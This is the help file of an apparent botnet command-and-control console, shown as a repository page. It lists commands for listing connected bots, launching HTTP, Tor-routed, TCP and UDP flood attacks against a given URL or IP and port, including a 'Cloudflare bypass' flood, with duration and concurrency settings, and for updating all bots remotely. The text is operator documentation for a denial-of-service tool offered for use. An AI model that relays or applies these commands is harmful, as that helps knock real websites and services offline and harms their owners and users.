-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathcnc_help.txt
35 lines (24 loc) · 1.24 KB
/
cnc_help.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
Command Description
help Show this help message.
clear Clear console logs.
bots Show the total bots connected.
bot_list Show connected bots list.
attacks Show currently running attacks.
attack Show an attack information. Usage:
attack [ATTACK ID]
launch Launch an attack. Usage:
launch http [URL] [DURATION] [CONCURRENCY]
launch http-post [URL] [DURATION] [CONCURRENCY]
launch hcf [URL] [DURATION] [CONCURRENCY] - HTTP Flood Cloudflare Bypass
launch tor-get [URL] [DURATION] [CONCURRENCY]
launch tor-post [URL] [DURATION] [CONCURRENCY]
launch tor-hcf [URL] [DURATION] [CONCURRENCY]
launch tor-tcp [IP:PORT] [DURATION] [CONCURRENCY]
launch tcp [IP:PORT] [DURATION] [CONCURRENCY]
launch udp [IP:PORT] [DURATION]
The minimum duration for every type of attack is 10,
concurrency is 1.
stop Stop a running attack. Usage:
stop [ATTACK ID]
stop_all Stop all currently running attacks.
update Update all connected bots with the local netro_bot.py